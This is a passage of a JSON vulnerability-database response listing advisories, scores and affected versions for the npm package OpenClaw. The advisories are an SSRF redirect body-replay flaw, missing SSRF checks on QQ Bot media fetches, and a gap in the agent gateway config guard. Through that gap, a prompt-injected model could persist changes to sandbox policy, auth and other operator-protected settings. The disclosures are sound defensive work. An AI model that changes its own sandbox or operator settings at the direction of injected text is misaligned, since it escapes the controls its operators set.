                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-pj41-sunw-vbcj"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.2"
                }
            ],
            "aliases": [
                "GHSA-rf75-g96h-j3rm"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-733f-57ds-xugm"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/88995?format=api",
            "vulnerability_id": "VCID-73cz-n29z-uqem",
            "summary": "Duplicate Advisory: OpenClaw: `fetchWithSsrFGuard` replays unsafe request bodies across cross-origin redirects\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-qx8j-g322-qj6m. This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw before 2026.3.31 (patched in 2026.4.8) contains a request body replay vulnerability in fetchWithSsrFGuard that allows unsafe request bodies to be resent across cross-origin redirects. Attackers can exploit this by triggering redirects to exfiltrate sensitive request data or headers to unintended origins.",
            "references": [
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-qx8j-g322-qj6m",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-qx8j-g322-qj6m"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40037",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40037"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-unsafe-request-body-replay-via-fetchwithssrfguard-cross-origin-redirects",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-unsafe-request-body-replay-via-fetchwithssrfguard-cross-origin-redirects"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-pg8g-f2hf-x82m",
                    "reference_id": "GHSA-pg8g-f2hf-x82m",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-pg8g-f2hf-x82m"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109872?format=api",
                    "purl": "pkg:npm/openclaw@2026.4.8",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2g7x-vu14-nkde"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dqb2-dej7-augt"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-h9a4-1twb-d7d1"
                        },
                        {
                            "vulnerability": "VCID-hy24-6xpe-pkb7"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-pj41-sunw-vbcj"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w2yd-uw91-9yck"
                        },
                        {
                            "vulnerability": "VCID-wyat-1259-2kg9"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.8"
                }
            ],
            "aliases": [
                "GHSA-pg8g-f2hf-x82m"
            ],
            "risk_score": 4.0,
            "exploitability": "0.5",
            "weighted_severity": "8.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-73cz-n29z-uqem"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/88979?format=api",
            "vulnerability_id": "VCID-75yr-sbce-nkah",
            "summary": "OpenClaw QQ Bot Extension missing SSRF Protection on All Media Fetch Paths\n## Impact\n\nQQ Bot Extension: Missing SSRF Protection on All Media Fetch Paths.\n\nQQ Bot media download paths were not consistently routed through the SSRF guard and allowlist policy.\n\nOpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.4.2`\n- Patched versions: `2026.4.8`\n\n## Fix\n\nThe issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`.\n\n## Verification\n\nThe fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary.\n\n## Credits\n\nThanks @adithyan-ak for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41914",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00036",
                            "scoring_system": "epss",
                            "scoring_elements": "0.11193",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00036",
                            "scoring_system": "epss",
                            "scoring_elements": "0.11153",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00036",
                            "scoring_system": "epss",
                            "scoring_elements": "0.11187",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41914"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-3fv3-6p2v-gxwj",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "5.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:H/SI:L/SA:N"
                        },
                        {
                            "value": "5.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-30T12:55:12Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-3fv3-6p2v-gxwj"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41914",
                    "reference_id": "CVE-2026-41914",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41914"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-3fv3-6p2v-gxwj",
                    "reference_id": "GHSA-3fv3-6p2v-gxwj",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-3fv3-6p2v-gxwj"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-server-side-request-forgery-in-qq-bot-media-fetch-paths",
                    "reference_id": "openclaw-server-side-request-forgery-in-qq-bot-media-fetch-paths",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N"
                        },
                        {
                            "value": "5.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:H/SI:L/SA:N"
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-30T12:55:12Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-server-side-request-forgery-in-qq-bot-media-fetch-paths"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109872?format=api",
                    "purl": "pkg:npm/openclaw@2026.4.8",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2g7x-vu14-nkde"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dqb2-dej7-augt"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-h9a4-1twb-d7d1"
                        },
                        {
                            "vulnerability": "VCID-hy24-6xpe-pkb7"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-pj41-sunw-vbcj"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w2yd-uw91-9yck"
                        },
                        {
                            "vulnerability": "VCID-wyat-1259-2kg9"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.8"
                }
            ],
            "aliases": [
                "CVE-2026-41914",
                "GHSA-3fv3-6p2v-gxwj"
            ],
            "risk_score": 3.9,
            "exploitability": "0.5",
            "weighted_severity": "7.7",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-75yr-sbce-nkah"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89144?format=api",
            "vulnerability_id": "VCID-7akj-469t-57hz",
            "summary": "OpenClaw: Agent gateway config mutations could change protected operator settings\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `< 2026.4.20`\n- Patched version: `2026.4.20`\n\n## Impact\n\nThe agent-facing `gateway config.patch` / `config.apply` guard did not cover several operator-trusted settings, including sandbox policy, plugin enablement, gateway auth/TLS, hook routing, MCP server configuration, SSRF policy, and filesystem hardening. A prompt-injected model with access to the owner-only gateway tool could persist changes to those settings.\n\nThis is a model-to-operator guard bypass, not a remote unauthenticated gateway compromise. Severity is medium.\n\n## Fix\n\nOpenClaw now blocks model-driven gateway config mutations for the broader operator-trusted path set and covers per-agent overrides and array-entry patching.\n\nFix commit:\n\n- `fe30b31a97a917ecc6e92f6c85378b6b20352422`\n\n## Release\n\nFixed in OpenClaw `2026.4.20`.",
            "references": [
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.0",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/fe30b31a97a917ecc6e92f6c85378b6b20352422",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.0",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/fe30b31a97a917ecc6e92f6c85378b6b20352422"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-7jm2-g593-4qrc",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "6.0",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-7jm2-g593-4qrc"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-7jm2-g593-4qrc",
                    "reference_id": "GHSA-7jm2-g593-4qrc",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-7jm2-g593-4qrc"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109923?format=api",
                    "purl": "pkg:npm/openclaw@2026.4.20",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.20"
                }
            ],
            "aliases": [
                "GHSA-7jm2-g593-4qrc"
            ],
            "risk_score": 3.1,
